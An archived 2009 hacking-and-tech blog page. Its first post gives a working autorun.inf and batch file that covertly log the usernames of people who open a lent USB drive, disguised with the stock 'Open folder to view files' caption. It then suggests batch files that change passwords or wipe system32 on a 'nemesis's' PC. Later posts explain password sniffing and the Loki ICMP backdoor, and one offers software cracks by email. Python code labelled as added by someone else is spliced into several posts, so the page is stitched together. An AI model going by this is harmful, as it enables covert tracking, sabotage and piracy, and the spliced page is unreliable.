Friday, May 8, 2009

Track USB drive users

I got an interesting email from my blog reader Reynold, who asked me how he can track the users who used his USB drive after he has given it to someone. He wanted to get the usernames of the accounts where the pendrive was used. I thought for a while and told him that he can achieve this either by using Trojans or by a combination of Batch and Autorun files. However, you must advise users not to format the pendrive in order for this to work. The second option, Batch files, was easy and less suspicious. So here is how I made it possible to get the usernames when the pendrive was plugged into a PC -

Create an autorun.inf file on the root of your flash drive/Pendrive with the following contents:

[autorun]
open=username.bat
action=Open folder to view files

Now, create a batch file called username.bat with the following contents:

@echo off
rem Redirection goes first: "echo %username%>>users.dat" misfires when the name ends in a digit (cmd reads "2>>" as a handle redirect)
>>users.dat echo %username%
date /t>>users.dat
time /t>>users.dat
start "Explorer" %SystemRoot%\explorer.exe

 Create username.bat and autorun.inf in the root of your pendrive

NOTE : The last line of the code is optional; it opens the drive in a new Explorer window.

Save both files and you are good to go. Now whenever a user plugs your pendrive into their PC, it will display an AutoPlay option indicating that they have to click on the icon to open the drive to view its contents. A small DOS window will flash for a moment and then disappear. Now if you go into the root of the drive, you will find a new file called users.dat which records the user names of all the users who have accessed your drive by clicking on the icon. You can open the DAT file using Notepad and view its contents.

However.. this is not a foolproof method, as some geeks disable the AutoPlay option (or disable writing to USB drives), or they just bypass it by pressing the RIGHT SHIFT key when the pendrive is connected, and hence their name will not be recorded; or they can simply delete the users.dat file. But that said, it will work fine nevertheless :)

NOTE 2 : Umm.. I think the above code is way too easy and harmless, so why not get creative and create a batch file which will even change the password (DOS NET commands) or even wipe out system32 of your nemesis (cacls command)?
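The flip side of the trick above is the check a defender runs on removable media before opening it. The following is an added example, not code from this post: it parses an autorun.inf and reports the directives that make a drive launch something (the post's own two lines are embedded as a constructed sample; the severity labels and the stock AutoPlay caption check are my own choices).

```python
"""Added example, not from the original post: audit an autorun.inf the way a
defender scanning removable media would, reporting the directives that make a
drive launch a program when it is plugged in or opened. Sample files are
constructed inline from the post's own two lines; no drive is needed."""
import configparser
import io

LAUNCH_KEYS = {"open", "shellexecute"}  # run on AutoPlay / when the drive is opened
PROGRAM_SUFFIXES = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js")
# Windows' own AutoPlay caption; an autorun.inf that reuses it is masquerading.
STOCK_CAPTION = "open folder to view files"


def audit_autorun(text: str) -> list:
    """Return (severity, message) findings for the text of one autorun.inf."""
    cfg = configparser.ConfigParser(allow_no_value=True, strict=False, interpolation=None)
    cfg.read_file(io.StringIO(text))
    # the section is written [autorun] or [AutoRun] in the wild; match either
    name = next((s for s in cfg.sections() if s.lower() == "autorun"), None)
    if name is None:
        return [("info", "no [autorun] section; nothing is launched automatically")]
    section, findings = cfg[name], []
    for key, value in section.items():  # configparser lower-cases the keys
        value = (value or "").strip().strip('"')
        target = value.split()[0].lower() if value else ""
        if key in LAUNCH_KEYS:
            sev = "high" if target.endswith(PROGRAM_SUFFIXES) else "medium"
            findings.append((sev, f"{key}= launches '{value}' on AutoPlay"))
        elif key.startswith("shell\\") and key.endswith("\\command"):
            findings.append(("high", f"{key}= binds a drive context-menu verb to '{value}'"))
        elif key == "shell" and value:
            findings.append(("medium", f"shell= makes '{value}' the default double-click verb"))
    if (section.get("action") or "").strip().strip('"').lower() == STOCK_CAPTION:
        findings.append(("medium", "action= copies the stock 'Open folder to view files' caption"))
    return findings


# Constructed samples: the post's autorun.inf, and a benign vendor one.
POST_AUTORUN = "[autorun]\nopen=username.bat\naction=Open folder to view files\n"
VENDOR_AUTORUN = "[AutoRun]\nicon=drivers.ico\nlabel=Vendor Drivers\n"
```

Run audit_autorun() over the autorun.inf found in a drive's root; the post's own file produces a "high" finding for open= and a "medium" one for the copied caption, while a vendor file that only sets icon= and label= produces none.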

 

Keep Learning friends..I mean it :P

 

POSTED BY XERO . ALL RIGHTS RESERVED.


Sniffers - An Introduction : Network Sniffers - 2

Sniffers - An Introduction
  • Sniffers monitor network data.

  • A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware programming.

  • Sniffers usually act as network probes or "snoops" -- examining network traffic but not intercepting or altering it.

  • Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels such as the Ethernet frame.

A sniffer is a piece of software that captures the traffic on a network. Sniffers are available for several platforms in both commercial and open-source variations. Some of the simplest packages use a command line interface and dump captured data to the screen, while sophisticated ones use a GUI, graph traffic statistics, track multiple sessions and offer several configuration options.

Sniffers are also the engines for other programs. Network Intrusion Detection Systems (NIDS) use sniffers to match packets against a rule-set designed to flag anything malicious or strange. Network utilization and monitoring programs often use sniffers to gather the data necessary for metrics and analysis. It is to be noted that sniffers do not intercept or alter the data they capture.

The most common way of networking computers is through Ethernet. The Ethernet protocol works by broadcasting packets to all hosts on the network, with the packet header containing the MAC address of the machine that is meant to receive the packet; all others are supposed to ignore it. A NIC (Network Interface Card, also known as an Ethernet card) that accepts all packets, regardless of the intended machine, is said to be in promiscuous mode. A sniffer is a program that sets the desired NIC into promiscuous mode.

A sniffer attack is commonly used to grab logins and passwords that are traveling around on the network. This is what is known as a passive attack because the attacker does not directly interface with any machine which the attacker may be trying to compromise.

Before we can explore how some sniffing tools are used by attackers towards malicious ends, let us examine what enables the tool to work. On a LAN, several PCs share a common connection to the Internet. The devices that come into play here include hubs, switches and routers, among others.

A switch performs the layer 2 or Data-Link layer function. That is, it simply looks at each packet or data unit and determines from a physical address (the "MAC address") which device a data unit is intended for and switches it out toward that device. A hub is a place of convergence where data arrives from one or more directions and is forwarded out in one or more other directions. The distinction seems to be that the hub is the place where data comes together and the switch is what determines how and where data is forwarded from the place where data comes together.

If the network is not switched, the traffic destined for any machine on a segment is broadcast to every machine on that segment. This means that a computer actually sees the data traveling to and from each of its neighbors, but ignores it, unless otherwise instructed.

The sniffer program works by asking a computer, specifically its Network Interface Card (NIC), to stop ignoring all the traffic headed to other computers and pay attention to them. It does this by placing the NIC in a state known as promiscuous mode. Once a NIC is promiscuous, (a status that requires administrative or root privileges) a machine can see all the data transmitted on its segment. The program then begins to constantly read all information entering the PC through the network card. A sniffer can therefore peel away the layers of encapsulation and decode the relevant information stored within. This includes information such as source computer, destination computer, targeted port number, payload etc - in short, every piece of information exchanged between two computers.

Security Concern

  • Users of computer networks unwittingly disclose sensitive information about themselves through the use of insecure software and protocols.

  • Standard implementations of widely adopted protocols such as Windows file sharing (CIFS/SMB), telnet, POP3, HTTP and FTP transmit login passwords in clear text, exposing an extremely large segment of the internet population to sniffing-related attacks.

A packet sniffer is notorious for its ability to "sniff" plain text passwords. On a normal LAN there are thousands of packets exchanged by numerous machines every minute. Therefore, anything transmitted in plaintext, such as passwords, web pages, database queries and messaging over the network, will be vulnerable to sniffing.

A sniffer can easily be customized to capture specific traffic like telnet sessions or e-mail. Once network traffic has been captured, an attacker can swiftly extract sensitive information such as logins, passwords and the text of messages to extend their attack. The disturbing part of the entire process is that users may remain clueless about the leakage of information until they are visibly compromised. This is because sniffers cause no damage or disturbance to a network environment.

Data is transmitted in the binary form over the network. Packet sniffers capture binary data passing through the network, and most of them decode this data into a human readable form. Another feature supported by popular sniffers is protocol analysis. This makes it even easier for attackers, as they can target specific protocols in accordance with their intent.

Sniffers vary in the degree of analysis they perform. This may be simple analysis involving just breaking the packet down into its fields; others are more complex, involving the detailed information contained in the packet (e.g., highlighting a password for a service). We will explore some sniffers in this module and see the functionality offered by them.

It must be borne in mind that sniffers have beneficial applications as well. In fact, the majority of them were designed for legitimate purposes. However, like double-edged swords, the end sought by their means lies in the mind of the user.

---Regards,
Amarjit Singh

Network Sniffers - 1

From today onwards, we will learn about Network Sniffers. Sniffers can be of great help to a network administrator as well, and can aid in securing the network by detecting abnormal traffic.

In the next few days, we will discuss:
  • An overview of sniffers (sometimes known as network protocol analyzers)

  • A cracker's perspective in using tools such as sniffers

  • Basic distinctions between active and passive sniffing

  • Understanding attack methodology such as ARP Spoofing and redirection

  • DNS and IP Sniffing and Spoofing

  • HTTPS Sniffing, and

  • Illustrations of various tools that are used in the above context.


---Regards,
Amarjit Singh

ICMP Tunneling

ICMP Tunneling
  • Covert Channels are methods in which an attacker can hide the data in a protocol that is undetectable.

  • Covert Channels rely on techniques called tunneling, which allows one protocol to be carried over another protocol.

  • ICMP tunneling is a method of using ICMP echo-request and echo-reply as a carrier of any payload an attacker may wish to use, in an attempt to stealthily access, or control a compromised system.

The Internet Control Message Protocol is an adjunct to the IP layer. It is a connectionless protocol used to convey error messages and other information to unicast addresses. ICMP packets are encapsulated inside an IP datagram. The first 4 bytes of the header are the same for every ICMP message, with the remainder of the header differing for different ICMP message types. There are 15 different types of ICMP messages.

The ICMP types we are concerned with are type 0x0 and type 0x8. ICMP type 0x0 specifies an ICMP_ECHOREPLY (the response) and type 0x8 indicates an ICMP_ECHO (the query). The normal course of action is for a type 0x8 to elicit a type 0x0 response from a listening server. (Normally, this server is actually the OS kernel of the target host; most ICMP traffic is, by default, handled by the kernel.) This is what the ping program does.

The concept of ICMP Tunneling involves arbitrary information tunneling in the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets and using them to carry the payload.

Covert Channels are methods in which an attacker can hide the data in a protocol that is undetectable. Covert Channels rely on techniques called tunneling, which allows one protocol to be carried over another protocol. A covert channel is a vessel in which information can pass, but this vessel is not ordinarily used for information exchange.

Consequently, covert channels are impossible to detect and deter using a system's normal (read: unmodified) security policy. In theory, almost any process or bit of data can be a covert channel. In practice, it is usually quite difficult to elicit meaningful data from most covert channels in a timely fashion.

This makes it an attractive mode of transmission for a Trojan. The attacker can use the covert channel and install the backdoor on the target machine.

The concept of ICMP Tunneling is simple: arbitrary information tunneling in the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets. This exploits the covert channel that exists inside of ICMP_ECHO traffic. This channel exists because network devices do not filter the contents of ICMP_ECHO traffic. They simply pass them, drop them, or return them. The Trojan packets themselves are masqueraded as common ICMP_ECHO traffic. We can encapsulate (tunnel) any information we want.

Hacking Tool: Loki

(www.phrack.com)

  • Loki was written by daemon9 to provide shell access over ICMP making it much more difficult to detect than TCP or UDP based backdoors.

  • As far as the network is concerned, a series of ICMP packets are shot back and forth: Ping, Pong-response. As far as the attacker is concerned, commands can be typed into the loki client and executed on the server.

This program is a working proof-of-concept to demonstrate that data can be transmitted rather stealthily across a network by hiding it in traffic that normally does not contain payloads. The example code in the original Phrack magazine can tunnel the equivalent of a Unix RCMD/RSH session in either ICMP echo request (ping) packets or UDP traffic to the DNS port. This is used as a back door into a UNIX system after root access has been compromised. The presence of Loki on a system is evidence that the system has been compromised in the past.

Although the payload of an ICMP packet is often timing information, no device checks the content of the data. So, as it turns out, this data can be arbitrary in content. Therein lies the covert channel. A covert channel is a vessel in which information can pass, but this vessel is not ordinarily used for information exchange. Therefore, covert channels are impossible to detect and deter using a system's normal security policy.

Loki exploits the covert channel that exists inside of ICMP_ECHO traffic. This channel exists because network devices do not filter the contents of ICMP_ECHO traffic. The Trojan packets themselves are masqueraded as common ICMP_ECHO traffic. It can be used as a backdoor into a system by providing a covert method of getting commands executed on a target machine. The Loki packet with a forged source IP address will arrive at the target (and will elicit a legitimate ICMP_ECHOREPLY, which will travel to the spoofed host and will subsequently be dropped silently) and can contain the 4-byte IP address of the desired target of the Loki response packets, as well as 51 bytes of malevolent data.

The important aspect of Loki is that routers, firewalls, packet-filters and dual-homed hosts can all serve as conduits for Loki. A surplus of ICMP_ECHOREPLY packets with a garbled payload can be a ready indication that the channel is in use. The standalone Loki server program can be easily detected. However, if the attacker can keep traffic on the channel down to a minimum, and were to hide the Loki server inside the kernel, detection is almost impossible.

Loki Countermeasures
  • Configure your firewall to block ICMP incoming and outgoing echo packets.

  • Blocking ICMP will disable ping requests and may cause inconvenience to users.

  • So you need to carefully weigh security vs. convenience.

  • Loki also has the option to run over UDP port 53 (DNS queries and responses.)

Disable external ICMP_ECHO traffic entirely. This does have serious implications for normal network management, since it affects network communication management within the local segment. However, this can be configured to allow internal ping traffic and disable packets coming from the outside.

Disable ICMP_ECHO_REPLY traffic on a Cisco router. Security implications make this a prudent choice.

Ensure that the routers are configured to not send ICMP_UNREACHABLE error packets to hosts that do not respond to ARPs.
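The layer peeling the sniffer post describes (Ethernet frame, IP header, port number, payload) and the "garbled payload" indicator given above for Loki can be shown in one short decoder. This is an added example, not code from either post or from Loki: it decodes constructed Ethernet/IPv4 frames, names the cleartext protocols the sniffer post lists by destination port, and flags echo packets whose data is not the pattern stock ping tools send (the Windows alphabet fill, or iputils' timestamp followed by ascending bytes). The port table and the ping-pattern heuristic are my own choices.

```python
"""Added example, not code from either post: a minimal decoder that peels the
Ethernet -> IPv4 -> TCP/ICMP layers as a sniffer does, names segments headed for
the cleartext protocols the sniffer post lists, and flags ICMP echo packets
whose payload is not what stock ping tools send, the indicator the ICMP
tunneling post gives. All frames are constructed inline (checksums left zero)."""
import struct

CLEARTEXT_PORTS = {21: "FTP", 23: "telnet", 80: "HTTP", 110: "POP3", 445: "SMB"}
WINDOWS_PING = b"abcdefghijklmnopqrstuvw" * 3  # Windows ping's repeating alphabet


def decode_frame(frame: bytes) -> dict:
    """Decode Ethernet II, IPv4 and the TCP or ICMP header that follows."""
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    pkt = {"src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":")}
    if ethertype != 0x0800:  # only IPv4 is decoded here
        return pkt
    ip = frame[14:]
    ihl, total_len, proto = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0], ip[9]
    pkt["src_ip"] = ".".join(map(str, ip[12:16]))
    pkt["dst_ip"] = ".".join(map(str, ip[16:20]))
    pkt["proto"] = proto
    l4 = ip[ihl:total_len]  # drop IP options and any Ethernet padding
    if proto == 6:  # TCP: ports, seq, ack, then the data-offset nibble
        sport, dport, _seq, _ack, off = struct.unpack("!HHIIB", l4[:13])
        pkt.update(sport=sport, dport=dport, payload=l4[(off >> 4) * 4:])
    elif proto == 1:  # ICMP: type, code, checksum, 4 bytes of id/seq, data
        pkt.update(icmp_type=l4[0], icmp_code=l4[1], payload=l4[8:])
    return pkt


def cleartext_service(pkt: dict):
    """Name of the cleartext protocol a TCP segment is headed to, else None."""
    return CLEARTEXT_PORTS.get(pkt.get("dport"))


def looks_like_ping_payload(data: bytes) -> bool:
    """True for what stock ping tools send: the Windows alphabet pattern, or
    (iputils) an 8- or 16-byte timestamp followed by ascending byte values."""
    if data == WINDOWS_PING[:len(data)]:
        return True
    for ts_len in (8, 16):
        tail = data[ts_len:]
        if len(tail) >= 2 and all((tail[i] + 1) & 0xFF == tail[i + 1]
                                  for i in range(len(tail) - 1)):
            return True
    return False


def suspicious_echo(pkt: dict) -> bool:
    """Flag an echo request/reply whose data is not a ping pattern."""
    if pkt.get("icmp_type") not in (0, 8):
        return False
    return not looks_like_ping_payload(pkt["payload"])


# Constructed sample traffic: helpers to build frames, then four test frames.
def build_frame(proto: int, src_ip: str, dst_ip: str, l4: bytes) -> bytes:
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                         bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return bytes.fromhex("001122334455 66778899aabb 0800") + ip_hdr + l4


def tcp_segment(sport: int, dport: int, payload: bytes) -> bytes:
    return struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload


def icmp_echo(icmp_type: int, payload: bytes) -> bytes:
    return struct.pack("!BBHHH", icmp_type, 0, 0, 0x1234, 1) + payload


TELNET_LOGIN = build_frame(6, "10.0.0.5", "10.0.0.9", tcp_segment(40001, 23, b"alice\r\n"))
TLS_HELLO = build_frame(6, "10.0.0.5", "10.0.0.9", tcp_segment(40002, 443, b"\x16\x03\x01"))
NORMAL_PING = build_frame(1, "10.0.0.5", "10.0.0.9",
                          icmp_echo(8, b"\x00" * 8 + bytes(range(0x10, 0x38))))
ODD_PING = build_frame(1, "10.0.0.9", "10.0.0.5", icmp_echo(0, b"not a ping pattern at all"))
```

Feed the same functions raw frames from a promiscuous-mode socket and count suspicious_echo() hits per source host; a steady stream from one peer is the "surplus of garbled echo replies" the text names.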

---Regards,
Amarjit Singh

Thursday, May 7, 2009

Duke Nukem Creators 3D Realms Shuts Down

The Duke Nukem maker and the publisher of the highly acclaimed "Max Payne", "Wolfenstein 3D" and "Commander Keen", 3D Realms, told Shacknews that the company has been shut down. The shutdown will affect both 3D Realms and the recently resurrected Apogee.

3D Realms was founded in 1987 by Scott Miller and George Broussard, and was best known for its Duke Nukem series of shooters starring the titular, bubblegum-lacking hero. The studio had infamously been working on Duke Nukem Forever, the next flagship franchise entry, for over 12 years and gave the last big push by releasing a short teaser for Duke in 2007. 3D Realms was known for quality in gaming and the easy atmosphere among its employees.

All the emails to the 3D Realms veterans have gone unanswered, and 3D Realms' publishing partner Take-Two and Apogee partner Deep Silver were likewise unavailable for comment. 3D Realms webmaster Joe Siegler remarked on the shutdown of the company: "It's not a marketing thing. It's true. I have nothing further to say at this time." The root cause was attributed to the discontinued funding of the company's ongoing projects. The employees have reportedly already been let go and the company is in the process of liquidation. However, luckily, the shutdown of 3D Realms has not affected the development of the upcoming Duke Nukem handheld trilogy, developed at Frontline Games.

Duke Nukem Nuked by shutting of 3D Realms

That makes one thing worse – Duke Nukem forever release gets more unlikely..sheesh..You can watch the Last Duke Nukem Forever trailer here

 

We loved you 3D realms…

 

Posted By XERO . ALL RIGHTS RESERVED.


Get Email alerts on Your Mobile for FREE

Hi friends.. last time I wrote about email alerts, it was only for Gmail users, but recently I stumbled across the wild wild web to find how to get my email alerts on my mobile (an old highly modded LG KG195), and the search was worth my time. I finally landed on WAY2SMS.COM, which allowed me to send free SMS all over India and even get email alerts on my mobile for free !!

Way2sms is an SMS gateway provider which allows you to send free SMS across India; the SMS are 140 characters long and include a 20-character advertisement through which the website covers its costs. Way2sms allows for seamless integration of Gmail and Yahoo accounts, and you can chat with your friends right from that site.

Well, that was a lot about Way2sms; now let's learn how we can use it to get free email alerts on mobile -

First register at www.way2sms.com and login into the site.

Login into way2sms

Now click on Mail tab and create a new way2sms email ID.

create a new way2sms email ID.

After you have created it,login into your Gmail account/Yahoo account or in short Email account :P

Gmail Users

All you have to do is Just link your Gmail account with your Way2SMS account. Here is the way -

  • Logon to your Gmail account
  • click on settings & then click on ‘FORWARDING/POP/IMAP’ option
  • Select “ Forward a copy of incoming mail to “ option & Enter your Way2SMS Email ID there which you just created

Forward Gmail Emails to way2sms

  • Click On Save
  • Finished. You will now receive alerts for every incoming mail that arrives in your Gmail id.

Yahoo Users

You only have to link your yahoo.co.in account with your Way2sms account,here is how you can do that -

  • Logon to your Yahoo mail account
  • Click on Options & then click on "Mail Options"
  • Select “ POP&Forwarding “ option & then Click on 'Setup or Edit POP & Forwarding' link.
  • Choose ' Forwarding ' option & Enter your Way2SMS Mail ID

Forward Yahoo Emails to way2sms

  • Click On Save. You will now receive alerts for every incoming mail that arrives in your YAHOO.CO.IN Account.

Any Other Email Users

All you have to do is Just forward a copy of your mail to your Way2SMS Mail Id…and you will get free email alerts on your mobile.

 

The only downside of using this service is that you have to reactivate it every 7 days but that's okay as it only takes the click of a button :P

Reactivation is just a click of a button

I have been enjoying this service and just want to say that its awesome. You can send sms,create groups,send group sms,get email alerts on your mobile on the go..what else do you want? Why wait,just go ahead and get going ..

 

Keep learning friends

 

POSTED BY XERO .ALL RIGHTS RESERVED. ALL NAMES AND TRADEMARKS BELONG TO THEIR RESPECTIVE OWNERS.

 


Wednesday, May 6, 2009

Secure Your Passwords Using Double Password

Well… long time ago, folks like me used to have strong passwords, which were rather a cryptic combination of words, numbers, symbols and logic like "h4x0rsrul35!!" and more.. and trust me, unless you are a 1337speaker (as in my case) these passwords are incredibly hard to remember.. forget these, even people tend to forget the simple passwords of their email IDs or of their user accounts, which may be hijacked or keylogged using keyloggers and other malicious software. Imagine having your personal data at stake and gone public due to weak passwords..

If you are a real data enthusiast, the only logical solution was to buy a secure token, but unfortunately it's expensive and needs software that has built-in support for this method of authentication. And if you are a geek with no money (like me) then here comes Double Password to the rescue.

Double Password turns any USB flash drive into a secure token! No need to purchase an additional expensive device. All you need is about 2 megabytes of free space on your flash drive or other USB gadget, such as an MP3 player, PDA or even a USB-pluggable mobile handset. Double Password installs onto your flash drive. When you type a password, the program intercepts it and converts it into a super-strong password string on-the-fly. You can use simple, easy-to-remember passwords without the risk of being cracked.

Another benefit of using Double Password is that nobody can steal your passwords. Spy programs are useless. Even if someone gets the "weak" password that you type on the keyboard, it means nothing. This password will only work when your USB flash is inserted.

While typical hardware locks will work only with software that supports secure tokens, Double Password works with any software. It simply substitutes your weak password with a strong one.

Double Password can be effectively used to securely lock your Windows account, to protect your laptop and to bring a new level of security to all software that uses password authentication.
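To make the "weak typed password becomes a strong one only while the drive is present" idea concrete, here is an added illustration. It is not Double Password's own code or algorithm, whose internals the post does not describe: it assumes a random 32-byte secret kept only on the drive, and derives the submitted password with HMAC-SHA256 over the typed text and the service name.

```python
"""Added illustration, not Double Password's own code or algorithm: one way a USB
"token" can turn an easy-to-remember password into a strong one on the fly. A
secret that lives only on the drive (assumed here to be a random 32-byte file)
is mixed with the typed password and the name of the service it is for using
HMAC-SHA256, so without the drive the typed text alone is useless."""
import base64
import hashlib
import hmac
import os


def new_token_secret() -> bytes:
    """Generated once when the drive is set up and stored only on the drive."""
    return os.urandom(32)


def strong_password(typed: str, service: str, secret: bytes, length: int = 24) -> str:
    """Derive the password actually submitted to `service` from what was typed.
    Mixing in the service name means one weak password never yields the same
    strong password for two different accounts."""
    msg = f"{service}\x00{typed}".encode()
    mac = hmac.new(secret, msg, hashlib.sha256).digest()
    # base64 yields letters, digits, '+' and '/'; trim to the requested length
    return base64.b64encode(mac).decode()[:length]


def substitute(typed: str, service: str, secret) -> str:
    """What reaches the application: the derived password while the drive is
    present (secret loaded), the raw typed text otherwise, so a typed weak
    password captured elsewhere logs nobody in."""
    if secret is None:
        return typed
    return strong_password(typed, service, secret)
```

Because the derivation is deterministic, the service name must be spelled identically every time, and losing the drive's secret file means losing every derived password, which is the same caveat any hardware token carries.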

Download Double Password

 

( PS: Need cracks? google them or email me :P )

 

Keep Learning ..

 

POSTED BY XERO.ALL RIGHTS RESERVED.


Tuesday, May 5, 2009

Enable Windows Vista Hidden Boot Screen

The Windows Vista boot screen is pointless, dull and in short – BORING. The guys at Redmond, Microsoft (?) decided to hide a more visually appealing boot screen of Windows Vista behind that blank piece of art (?). However, the hidden boot screen can be easily enabled in Windows Vista in full glory and with very little trouble. I'm not sure why they didn't make the boot screen better, but I think they wanted to give Windows users a surprise at what Vista might be hiding underneath (which failed miserably). Seriously, if you really want a better boot screen, you can check out my article on creating a custom boot logo, which is easy to pick up and good to go :) here

For the time being,here is how you can enable the hidden boot screen in Windows Vista -

Now..Here's the default boot screen:

The Original Windows Vista Boot Screen..dull,and pointless

And here's the hidden one, called "Aurora" (Nice name..)

The Hidden Aurora Boot screen,much more appealing then the original

For enabling it,all you have to do is type msconfig into the start menu search box, and hit enter.

Type msconfig in search box

Now navigate to boot tab,and then check the "No GUI boot" checkbox.

check the "No GUI boot" checkbox.

Hit OK and reboot the computer. You should see the new boot screen immediately on restart.

Note: You may get a Windows Defender error on the next startup. You can enable the system config utility using the tray icon and this error will go away.

 

Keep Learning :)

 

POSTED BY XERO. SOURCE: HOW TO GEEK. ALL RIGHTS RESERVED.
